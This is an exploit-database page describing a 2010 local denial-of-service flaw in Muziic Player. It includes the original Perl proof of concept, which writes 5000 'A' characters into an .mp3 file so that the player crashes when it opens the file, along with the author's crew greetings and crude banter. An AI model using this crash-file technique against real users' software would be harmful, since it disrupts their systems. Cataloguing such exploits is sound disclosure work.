header-logo
Suggest Exploit
vendor:
Muziic Player
by:
Red-D3v1L
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Muziic Player
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Muziic Player (.mp3) Local Denial of Service (DoS)

This exploit is a local denial of service vulnerability in Muziic Player. It is triggered by creating a malicious .mp3 file with 5000 'A' characters, which causes the application to crash when opened. This exploit was discovered by Red-D3v1L in 2010.

Mitigation:

The user should avoid opening untrusted .mp3 files.
Source

Exploit-DB raw data:

# Exploit Title: Muziic Player (.mp3) Local Denial of Service (DoS)
# Download : http://download.cnet.com/3001-20_4-10910117.html?spi=e0c701df9e16242fca1997f71350aba0
# Author: Red-D3v1L
## sh0otz fly t0 : r1z , D3v1L-Fuck3r, SarBooT511 , Sas-Terr0risT , AnGeL25dZ ,H1s0k4 , HcJ , Cyb3r-1st#
# n00bz : Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ...
# my Home : www.sec-r1z.com , sEc-r1z CrEw#
#!/usr/bin/perl
system ("color a");
print "./SEC-R1Z_ _   _  _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n";
print " /  / _ _   \\ /  __ _\ /   _ _ /\\       \  <   |/_ _ _ _ /\n";
print " \\  \\ _ _\\__ /  /_ _ /  /  __   |  ()   / |  |    /   /\n";
print "  \\ \__ _ \\  /  /_ _ /  /  |__|  |      /  |  |   /   /\n";
print "  _ _ _ _ \\/       /  \/2_0_1_0  |       \\\ |  |  /   /_____ \n";
print " /_ _ _ _ / \_ _ _ /\ _ _ _ /  |__|\ __\ |__| /___\\/J0_ _____./str1k3z y0u!!\n";
###################################
my $r1z= "b00m.mp3";
my $boom="\x41" x 5000;
open(myfile,'>>b00m.mp3');
print myfile $boom;
print "[+] d0nE\n";